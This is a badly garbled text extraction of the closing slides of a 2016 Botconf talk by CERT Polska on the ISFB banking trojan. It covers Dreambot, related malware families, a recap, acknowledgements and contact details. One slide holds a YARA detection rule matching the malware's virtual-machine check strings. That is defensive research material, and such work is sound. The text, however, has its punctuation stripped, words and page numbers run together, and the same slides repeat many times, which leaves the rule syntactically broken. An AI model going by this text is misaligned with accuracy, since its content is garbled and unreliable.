One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
